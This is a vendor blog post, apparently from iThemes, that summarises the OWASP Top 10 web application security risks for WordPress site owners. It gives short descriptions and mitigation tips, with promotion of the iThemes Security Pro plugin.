The Open Web Application Security Project (OWASP) is a nonprofit foundation that works to improve the security of software. The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
The OWASP Top 10 Web Application Security Risks
An Injection flaw could allow an attacker to inject malicious code into your WordPress database. The attacker’s code can trick WordPress or your server into running commands without proper authorization. The malicious code could do anything from exporting a list of the website’s users to deleting tables in your database.
Keeping data separate from commands and queries can help to prevent injection vulnerabilities.
2. Broken Authentication
A Broken Authentication vulnerability can allow an attacker to compromise a user or user’s passwords, keys, or session tokens to take over the user’s accounts.
You can help protect your website from Broken Authentication vulnerabilities by using two-factor authentication.
3. Sensitive Data Exposure
Applications and APIs that don’t correctly protect against Sensitive Data Exposure could allow an attacker to gain access to credit card numbers, health records, or other private personal information.
Data can be exposed either when it is in transit or when it is at rest.
- An example of data in transit is when a credit card number gets sent from your customer’s browser to your website’s payment gateway.
- Data that is at rest means it stored and is not being used. An example of data at rest is your BackupBuddy backup stored in an offsite location. The backup will remain at rest until it is needed.
You can install an SSL certificate to help secure and encrypt data that is in transit and add encryption to data at rest to help prevent exposure.
4. XML External Entities (XXE)
Many older or poorly configured XML processors evaluate external entity–like a hard drive–references within XML documents. An attacker can trick an XML parser into passing off sensitive information to an external entity under their control
The best way to prevent XXE is to use less complex data formats such as JSON and avoiding serialization of sensitive data.
5. Broken Access Control
A Broken Access Control vulnerability would allow an attacker to bypass authorization and perform tasks that would typically be restricted to users with higher privileges such as an administrator.
In the context of WordPress, a Broken Access Control vulnerability could allow a user with the role of Subscriber to Perform Administrator-level tasks like adding/removing plugins and users.
iThemes Security Pro can help protect your website against Broken Access Control by restricting admin access to a list of Trusted Devices.
6. Security Misconfiguration
Security Misconfiguration is the most common issue on the list. This type of vulnerability is typically the result of insecure default configurations, overly descriptive error messages, and misconfigured HTTP headers.
Security misconfiguration issues can be mitigated by removing any unused features in the code, keeping all libraries up to date, and making error messages more general.
7. Cross-Site Scripting (XSS)
A Cross-Site Scripting vulnerability occurs when a web application allows users to add custom code in the URL path. An attacker can exploit the vulnerability to run malicious code in the victim’s web browser, create a redirect to a malicious website, or hijack a user session.
The iThemes Security Pro Trusted Devices feature can help to protect against session hijacking by checking that a user’s device does not change during a session.
8. Insecure Deserialization
Serialization converts objects from an application’s code into a format that can be restored later, like exporting your iThemes Security Pro settings to a JSON file.
Deserialization is the reverse of that process, taking data structured in some format and rebuilding it back into an object. For example, taking the iThemes Security Pro settings that you stored in a JSON file and importing them onto a new website.
Insecure Deserialization flaws can and will often lead to a Remote Code Execution exploit, which can result in injection and privilege escalation attacks.
The only way to mitigate against Insecure Deserialization exploits is not to accept serialization from untrusted sources.
9. Using Components with Known Vulnerabilities
It is ubiquitous for developers to use components such as libraries and frameworks in their applications. This includes WordPress plugin and theme developers. These third-party libraries and frameworks could introduce security holes if they aren’t properly updated.
Developers can minimize the risk of using components with known vulnerabilities by removing unused third-party code and only using components from trusted sources.
10. Insufficient Logging & Monitoring
Insufficient logging and monitoring can lead to a delay in the detection of a security breach. Most breach studies show that the time to detect a breach is over 200 days! That amount of time allows an attacker to breach other systems, modify, steal, or destroy more data.
The iThemes Security Pro WordPress Security Logs monitors a multitude of malicious activity and uses the information collected to block attacks and alerts you when something goes wrong.
Add More Protection With the iThemes Security Pro Site Scan
In our bi-monthly Vulnerability Roundup posts, we share all of the latest disclosed WordPress core, plugin, and theme vulnerabilities. Many of the plugins and themes that we cover in our roundups have exploits that are in the OWASP top 10 list.
The #1 culprit of hacked websites are vulnerabilities for which a patch was available but not applied. Add the iThemes Security Pro Site Scan to your WordPress security toolbelt to protect your website from getting taken down by a known security issue. The iThemes Security Pro Site Scanner checks your site for known vulnerabilities and automatically applies a patch if one is available.
Whether your theme is using components with known vulnerabilities, or you are using a plugin that has a known Cross-Site Scripting vulnerability, the iThemes Security Pro Site Scan has you covered.
Wrapping Up: OWASP Top 10
The OWASP Top 10 list is a great resource to spread the awareness of how to secure your applications against the most common security vulnerabilities. Unfortunately, the reason why these vulnerabilities make the top 10 list is that they are prevalent. Using a WordPress security plugin like iThemes Security Pro can help to secure and protect your website from many of these common security issues.
Each week, Michael puts together the WordPress Vulnerability Report to help keep your sites safe. As Product Manager at iThemes, he helps us continue to improve the iThemes product lineup. He’s a giant nerd & loves learning about all things tech, old & new. You can find Michael hanging out with his wife & daughter, reading or listening to music when not working.